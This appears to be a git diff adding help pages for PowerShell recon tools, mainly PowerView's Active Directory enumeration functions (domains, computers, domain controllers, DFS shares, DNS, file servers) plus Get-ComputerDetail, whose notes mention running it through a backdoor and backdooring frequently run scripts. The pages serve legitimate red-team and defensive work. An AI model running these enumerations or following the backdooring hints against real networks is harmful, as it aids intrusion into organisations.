+### -Jitter
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
+
+```yaml
+Type: Double
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0.3
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Threads
+The number of threads to use for user searching, defaults to 20.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 20
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### String
+
+Computer dnshostnames the current user has administrative access to.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-ComputerDetail.md b/docs/Recon/Get-ComputerDetail.md new file mode 100755 index 0000000..15a3feb --- /dev/null +++ b/docs/Recon/Get-ComputerDetail.md @@ -0,0 +1,68 @@ +# Get-ComputerDetail
+
+## SYNOPSIS
+This script is used to get useful information from a computer.
+
+Function: Get-ComputerDetail
+Author: Joe Bialek, Twitter: @JosephBialek
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Get-ComputerDetail [-ToString]
+```
+
+## DESCRIPTION
+This script is used to get useful information from a computer.
+Currently, the script gets the following information:
+-Explicit Credential Logons (Event ID 4648)
+-Logon events (Event ID 4624)
+-AppLocker logs to find what processes are created
+-PowerShell logs to find PowerShell scripts which have been executed
+-RDP Client Saved Servers, which indicates what servers the user typically RDP's in to
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-ComputerDetail
+```
+
+Gets information about the computer and outputs it as PowerShell objects.
+
+Get-ComputerDetail -ToString
+Gets information about the computer and outputs it as raw text.
+
+## PARAMETERS
+
+### -ToString
+Switch: Outputs the data as text instead of objects, good if you are using this script through a backdoor.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+This script is useful for fingerprinting a server to see who connects to this server (from where), and where users on this server connect to.
+You can also use it to find Powershell scripts and executables which are typically run, and then use this to backdoor those files.
+
+## RELATED LINKS
+
+[Blog: http://clymb3r.wordpress.com/
+Github repo: https://github.com/clymb3r/PowerShell](Blog: http://clymb3r.wordpress.com/
+Github repo: https://github.com/clymb3r/PowerShell)
+
diff --git a/docs/Recon/Get-Domain.md b/docs/Recon/Get-Domain.md new file mode 100755 index 0000000..aa8098c --- /dev/null +++ b/docs/Recon/Get-Domain.md @@ -0,0 +1,81 @@ +# Get-Domain
+
+## SYNOPSIS
+Returns the domain object for the current (or specified) domain.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Get-Domain [[-Domain] <String>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Returns a System.DirectoryServices.ActiveDirectory.Domain object for the current
+domain or the domain specified with -Domain X.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-Domain -Domain testlab.local
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-Domain -Credential $Cred
+
+## PARAMETERS
+
+### -Domain
+Specifies the domain name to query for, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### System.DirectoryServices.ActiveDirectory.Domain
+
+A complex .NET domain object.
+
+## NOTES
+
+## RELATED LINKS
+
+[http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG](http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG)
+
diff --git a/docs/Recon/Get-DomainComputer.md b/docs/Recon/Get-DomainComputer.md new file mode 100755 index 0000000..562f769 --- /dev/null +++ b/docs/Recon/Get-DomainComputer.md @@ -0,0 +1,426 @@ +# Get-DomainComputer
+
+## SYNOPSIS
+Return all computers or specific computer objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty
+
+## SYNTAX
+
+```
+Get-DomainComputer [[-Identity] <String[]>] [-Unconstrained] [-TrustedToAuth] [-Printers] [-SPN <String>]
+ [-OperatingSystem <String>] [-ServicePack <String>] [-SiteName <String>] [-Ping] [-Domain <String>]
+ [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>] [-Server <String>]
+ [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>]
+ [-Tombstone] [-FindOne] [-Credential <PSCredential>] [-Raw]
+```
+
+## DESCRIPTION
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria.
+To only return specific properies, use
+"-Properties samaccountname,usnchanged,...".
+By default, all computer objects for
+the current domain are returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainComputer
+```
+
+Returns the current computers in current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainComputer -SPN mssql* -Domain testlab.local
+```
+
+Returns all MS SQL servers in the testlab.local domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainComputer -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" -Unconstrained
+```
+
+Search the specified OU for computeres that allow unconstrained delegation.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainComputer -Credential $Cred
+
+## PARAMETERS
+
+### -Identity
+A SamAccountName (e.g.
+WINDOWS10$), DistinguishedName (e.g.
+CN=WINDOWS10,CN=Computers,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g.
+4f16b6bc-7010-4cbf-b628-f3cfe20f6994),
+or a dns host name (e.g.
+windows10.testlab.local).
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: SamAccountName, Name, DNSHostName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Unconstrained
+Switch.
+Return computer objects that have unconstrained delegation.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -TrustedToAuth
+Switch.
+Return computer objects that are trusted to authenticate for other principals.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Printers
+Switch.
+Return only printers.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SPN
+Return computers with a specific service principal name, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServicePrincipalName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -OperatingSystem
+Return computers with a specific operating system, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServicePack
+Return computers with a specific service pack, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SiteName
+Return computers in the specific AD Site name, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Ping
+Switch.
+Ping each host to ensure it's up before enumerating.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Raw
+Switch.
+Return raw results instead of translating the fields into a custom PSObject.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.Computer
+
+Custom PSObject with translated computer property fields.
+
+PowerView.Computer.Raw
+
+The raw DirectoryServices.SearchResult object, if -Raw is enabled.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainController.md b/docs/Recon/Get-DomainController.md new file mode 100755 index 0000000..3d15f5c --- /dev/null +++ b/docs/Recon/Get-DomainController.md @@ -0,0 +1,132 @@ +# Get-DomainController
+
+## SYNOPSIS
+Return the domain controllers for the current (or specified) domain.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Get-Domain
+
+## SYNTAX
+
+```
+Get-DomainController [[-Domain] <String>] [-Server <String>] [-LDAP] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Enumerates the domain controllers for the current or specified domain.
+By default built in .NET methods are used.
+The -LDAP switch uses Get-DomainComputer
+to search for domain controllers.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainController -Domain 'test.local'
+```
+
+Determine the domain controllers for 'test.local'.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainController -Domain 'test.local' -LDAP
+```
+
+Determine the domain controllers for 'test.local' using LDAP queries.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+'test.local' | Get-DomainController
+```
+
+Determine the domain controllers for 'test.local'.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainController -Credential $Cred
+
+## PARAMETERS
+
+### -Domain
+The domain to query for domain controllers, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAP
+Switch.
+Use LDAP queries to determine the domain controllers instead of built in .NET methods.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.Computer
+
+Outputs custom PSObjects with details about the enumerated domain controller if -LDAP is specified.
+
+System.DirectoryServices.ActiveDirectory.DomainController
+
+If -LDAP isn't specified.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainDFSShare.md b/docs/Recon/Get-DomainDFSShare.md new file mode 100755 index 0000000..ce33275 --- /dev/null +++ b/docs/Recon/Get-DomainDFSShare.md @@ -0,0 +1,202 @@ +# Get-DomainDFSShare
+
+## SYNOPSIS
+Returns a list of all fault-tolerant distributed file systems
+for the current (or specified) domain.
+
+Author: Ben Campbell (@meatballs__)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher
+
+## SYNTAX
+
+```
+Get-DomainDFSShare [[-Domain] <String[]>] [[-SearchBase] <String>] [[-Server] <String>]
+ [[-SearchScope] <String>] [[-ResultPageSize] <Int32>] [[-ServerTimeLimit] <Int32>] [-Tombstone]
+ [[-Credential] <PSCredential>] [[-Version] <String>]
+```
+
+## DESCRIPTION
+This function searches for all distributed file systems (either version
+1, 2, or both depending on -Version X) by searching for domain objects
+matching (objectClass=fTDfs) or (objectClass=msDFS-Linkv2), respectively
+The server data is parsed appropriately and returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainDFSShare
+```
+
+Returns all distributed file system shares for the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainDFSShare -Domain testlab.local
+```
+
+Returns all distributed file system shares for the 'testlab.local' domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainDFSShare -Credential $Cred
+
+## PARAMETERS
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DomainName, Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: 3
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 4
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 5
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 6
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 7
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Version
+{{Fill Version Description}}
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 8
+Default value: All
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### System.Management.Automation.PSCustomObject
+
+A custom PSObject describing the distributed file systems.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainDNSRecord.md b/docs/Recon/Get-DomainDNSRecord.md new file mode 100755 index 0000000..e444fd5 --- /dev/null +++ b/docs/Recon/Get-DomainDNSRecord.md @@ -0,0 +1,181 @@ +# Get-DomainDNSRecord
+
+## SYNOPSIS
+Enumerates the Active Directory DNS records for a given zone.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-DNSRecord
+
+## SYNTAX
+
+```
+Get-DomainDNSRecord [-ZoneName] <String> [-Domain <String>] [-Server <String>] [-Properties <String[]>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-FindOne] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Given a specific Active Directory DNS zone name, query for all 'dnsNode'
+LDAP entries using that zone as the search base.
+Return all DNS entry results
+and use Convert-DNSRecord to try to convert the binary DNS record blobs.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainDNSRecord -ZoneName testlab.local
+```
+
+Retrieve all records for the testlab.local zone.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainDNSZone | Get-DomainDNSRecord
+```
+
+Retrieve all records for all zones in the current domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainDNSZone -Domain dev.testlab.local | Get-DomainDNSRecord -Domain dev.testlab.local
+```
+
+Retrieve all records for all zones in the dev.testlab.local domain.
+
+## PARAMETERS
+
+### -ZoneName
+Specifies the zone to query for records (which can be enumearted with Get-DomainDNSZone).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+The domain to query for zones, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to for the search.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Name,distinguishedname,dnsrecord,whencreated,whenchanged
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.DNSRecord
+
+Outputs custom PSObjects with detailed information about the DNS record entry.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainDNSZone.md b/docs/Recon/Get-DomainDNSZone.md new file mode 100755 index 0000000..7065b26 --- /dev/null +++ b/docs/Recon/Get-DomainDNSZone.md @@ -0,0 +1,156 @@ +# Get-DomainDNSZone
+
+## SYNOPSIS
+Enumerates the Active Directory DNS zones for a given domain.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty
+
+## SYNTAX
+
+```
+Get-DomainDNSZone [[-Domain] <String>] [-Server <String>] [-Properties <String[]>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-FindOne] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+{{Fill in the Description}}
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainDNSZone
+```
+
+Retrieves the DNS zones for the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainDNSZone -Domain dev.testlab.local -Server primary.testlab.local
+```
+
+Retrieves the DNS zones for the dev.testlab.local domain, binding to primary.testlab.local.
+
+## PARAMETERS
+
+### -Domain
+The domain to query for zones, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to for the search.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.DNSZone
+
+Outputs custom PSObjects with detailed information about the DNS zone.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainFileServer.md b/docs/Recon/Get-DomainFileServer.md new file mode 100755 index 0000000..34e9f00 --- /dev/null +++ b/docs/Recon/Get-DomainFileServer.md @@ -0,0 +1,200 @@ +# Get-DomainFileServer
+
+## SYNOPSIS
+Returns a list of servers likely functioning as file servers.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher
+
+## SYNTAX
+
+```
+Get-DomainFileServer [[-Domain] <String[]>] [[-LDAPFilter] <String>] [[-SearchBase] <String>]
+ [[-Server] <String>] [[-SearchScope] <String>] [[-ResultPageSize] <Int32>] [[-ServerTimeLimit] <Int32>]
+ [-Tombstone] [[-Credential] <PSCredential>]
+```
+
+## DESCRIPTION
+Returns a list of likely fileservers by searching for all users in Active Directory
+with non-null homedirectory, scriptpath, or profilepath fields, and extracting/uniquifying
+the server names.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainFileServer
+```
+
+Returns active file servers for the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainFileServer -Domain testing.local
+```
+
+Returns active file servers for the 'testing.local' domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainFileServer -Credential $Cred
+
+## PARAMETERS
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DomainName, Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: 3
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: 4
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 5
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 6
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
